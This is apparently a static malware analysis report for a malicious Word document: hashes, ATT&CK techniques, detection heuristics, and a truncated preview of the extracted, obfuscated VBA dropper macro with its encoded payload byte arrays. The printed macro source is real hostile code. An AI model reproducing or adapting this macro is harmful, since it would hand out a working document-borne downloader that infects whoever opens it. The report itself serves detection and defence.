Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e390b688bd3d4525…

MALICIOUS

Office (OLE)

Size: 284.0 KB | Created: 2015-12-16 14:32:00 | Authoring application: Microsoft Office Word | First seen: 2017-11-29
MD5: 8f6367cf48540a30438c5c76a951829d
SHA-1: 1c440f4fd7302ba0b984b6fe76ec30d3dce392f8
SHA-256: e390b688bd3d4525fdd4ed816bebc55e08d5228a683a62056847eb935fd8f306
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro that uses the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The obfuscated VBA code and the declaration of an external DLL ('WAfnY2e') with an aliased function ('T7CYs9JpQeKYa') suggest downloader or dropper functionality.

Heuristics (5)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL | Channel
    • http://ns.adobe.com/xap/1.0/ | In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# | In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ | In document text (OLE body)
    • http://www.iec.ch | In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ | In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/ | In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main | In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45572 bytes
SHA-256: 074da90464abf51c23f7ff945226c40fabe923d1c28997bed084c25f4620b532
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function KLdP5FaGebJdf Lib "WAfnY2e" Alias "T7CYs9JpQeKYa" (ByVal QuhNED016lne As String, OJkjkgzBzN As Long) As Long
#Else
Private Declare Function KLdP5FaGebJdf lib "WAfnY2e" Alias "T7CYs9JpQeKYa"(byval QuhNED016lne as String, OJkjkgzBzN as Long ) as Long
#End If
Dim EFnMW9uqqwMh As String, A4cmLA5fea As Integer
Dim A4cmLA5fea1() As Variant, A4cmLA5fea2() As Variant, A4cmLA5fea3() As Variant, A4cmLA5fea4() As Variant, A4cmLA5fea5() As Variant, A4cmLA5fea6() As Variant, A4cmLA5fea7() As Variant, A4cmLA5fea8() As Variant, A4cmLA5fea9() As Variant, A4cmLA5fea10() As Variant
Dim A4cmLA5fea11() As Variant, A4cmLA5fea12() As Variant, A4cmLA5fea13() As Variant, A4cmLA5fea14() As Variant, A4cmLA5fea15() As Variant, A4cmLA5fea16() As Variant, A4cmLA5fea17() As Variant, A4cmLA5fea18() As Variant, A4cmLA5fea19() As Variant, A4cmLA5fea20() As Variant
Dim A4cmLA5fea21() As Variant, A4cmLA5fea22() As Variant, A4cmLA5fea23() As Variant, A4cmLA5fea24() As Variant, A4cmLA5fea25() As Variant, A4cmLA5fea26() As Variant, A4cmLA5fea27() As Variant, A4cmLA5fea28() As Variant, A4cmLA5fea29() As Variant, A4cmLA5fea30() As Variant, A4cmLA5fea31() As Variant, A4cmLA5fea32() As Variant, A4cmLA5fea33() As Variant, A4cmLA5fea34() As Variant, A4cmLA5fea35() As Variant, A4cmLA5fea36() As Variant
Sub LHJwPn()
NrSyi8bt999vkR = 71
If Abs(6) = 57 Then OzAJDIA = 7498
Load QHW95ygCCXLKMlehi
DateSerial 52, 90, 50
DeleteSetting "Qp4Y8D4vz89Olb"
Randomize
DyCTQ9UKs03HGVdP = EOF(96)
If IsMissing(31) = True Then XwRmTkWR84BfUqAHC = 80
DWcjwawOjsm = CVErr(31)
Hour 53
AppActivate 41
HDM9913zDtS = 60
End Sub
Function zKK(U6jMo As Integer) As Boolean
PdKLCGN = 61
Static HFBwwFtzVi0lGw38q As Byte
G7UUZ5FN3z = 78
HFBwwFtzVi0lGw38q = HFBwwFtzVi0lGw38q + 1
OuWaqUF1z = 48
If HFBwwFtzVi0lGw38q = 1 Then Debug.Assert Not zKK(59)
AeIBD = 73
zKK = HFBwwFtzVi0lGw38q = 0
Q9dlGz5OfQm = 70
HFBwwFtzVi0lGw38q = 0
QPM3j8cFUa0L = 81
End Function
Sub OJwHPvvkNBx()
WBJkej = 47
On Error Resume Next
B0K8bUdQ = 54
A4cmLA5fea1() = Array(205, 250, 201, 224, 251, 227, 50, 81, 126, 59, 75, 21, 29, 69, 127, 10, 44, 1, 83, 0, 9, 44, 42, 19, 12, 8, 20, 103, 115, 80, 29, 40, 55, 1, 12, 95, 83, 111, 87, 119, 87, 109, 99, 124, 17, 55, 95, 124, 0, 117, 58, 108, 70, 117, 69, 5, 8, 48, 123, 72, 4, 99, 35, 47, 90, 9, 100, 43, 120, 27, 94, 67, 66, 68, 82, 20, 47, 85, 121, 113, 76, 97, 17, 66, 36, 110, 114, 67, 33, 120, 111, 15, 124, 66, 92, 78, 8, 60, 111, 51, 14, 87, 103, 57, 24, 47, 43, 120, 116, 100, 110, 127, 64, 70, 101, 113, 19, 41, 77, 121, 87, 75, 99, 122, 19, 32, 22, 43, 249, 199, 128, 192, 147, 140, 163, 148, 158, 143, 161, 255, 189, 177, 247, 178, 175, 189, 177, 149, 156, 142, 157, 187, 136, 179, 183, 211, 183, 196, 169, 188, 209, 231, 245, 165, 198, 251, 198, 227, 197, 249, 249, 170, 202, 244, 204, 225, 221, 147, 227, 195, 214, 234, 213, 242, 211, 159, 232, 207, 204, 249, 205, 132, 169, 240, 210, 196, 223, 156, 219, 208, 200, 194, 237)
VpGcg5LX = 51
A4cmLA5fea2() = Array(189, 204, 199, 246, 225, 171, 156, 154, 204, 227, 229, 226, 226, 161, 255, 209, 220, 194, 211, 204, 139, 153, 167, 199, 170, 250, 231, 130, 225, 140, 187, 184, 248, 158, 167, 250, 247, 205, 181, 224, 183, 196, 191, 135, 163, 248, 168, 124, 109, 110, 1, 101, 89, 1, 40, 21, 94, 14, 52, 35, 35, 108, 95, 92, 24, 126, 71, 21, 14, 124, 60, 0, 73, 5, 37, 38, 7, 19, 95, 91, 8, 29, 0, 196, 165, 221, 255, 200, 166, 60, 22, 9, 58, 32, 12, 94, 12, 50, 38, 105, 43, 115, 22, 33, 111, 39, 10, 46, 88, 48, 49, 84, 14, 108, 85, 53, 19, 11, 15, 22, 108, 57, 42, 22, 53, 4, 61, 14, 112, 65, 126, 87, 101, 75, 117, 17, 109, 9, 127, 35, 6, 4, 26, 18, 104, 3, 1, 39, 94, 84, 77, 72, 6, 54, 15, 59, 108, 117, 97, 94, 22, 125, 16, 53, 68, 54, 6, 4, 70, 36, 29, 90, 74, 119, 31, 119, 37, 107, 11
... (truncated)